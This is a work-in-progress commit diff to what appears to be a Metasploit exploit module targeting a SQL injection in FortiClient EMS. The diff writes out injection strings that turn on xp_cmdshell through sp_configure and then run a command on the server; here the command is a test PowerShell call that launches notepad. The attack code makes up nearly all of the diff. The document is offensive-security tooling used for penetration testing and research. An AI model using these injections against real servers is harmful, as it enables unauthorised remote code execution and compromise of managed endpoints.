WIP

jheysel-r7 · jheysel-r7 · commit e6f235224817 · 2024-07-19T14:43:13.000-07:00
diff --git a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -168,6 +168,11 @@ def check
     CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")
   end
 
+  def fully_url_encode(string)
+    string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
+  end
+
+
   def exploit
     # Things to note:
     # 1. xp_cmdshell is disabled by default so first we must enable it.
@@ -176,13 +181,26 @@ def exploit
     # before running the command with xp_command shell.
     # 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which
     # is when we expect the response to be empty.
+    # inject = [
+    #   "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
+    #   "' OR 1=1; reconfigure;--",
+    #   "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
+    #   "' OR 1=1; reconfigure;--",
+    #   "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
+    # ]
+    command = "notepad.exe"
+    print_status("Encoding command #{command}")
+    print_status("URL Encoded version of the command: #{fully_url_encode(command)}")
+    payload = <<~PLOAD
+powershell.exe -command ""notepad.exe""
+PLOAD
+
+    payload = payload.chomp
+    print_status("Payload is: #{payload}")
     inject = [
-      "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",
-      "' OR 1=1; reconfigure;--",
-      "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",
-      "' OR 1=1; reconfigure;--",
-      "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
+      "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell',1; reconfigure; exec master.dbo.xp_cmdshell '#{payload}';--",
     ]
+
     inject.each do |sqli|
       if sqli == inject.last
         send_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')
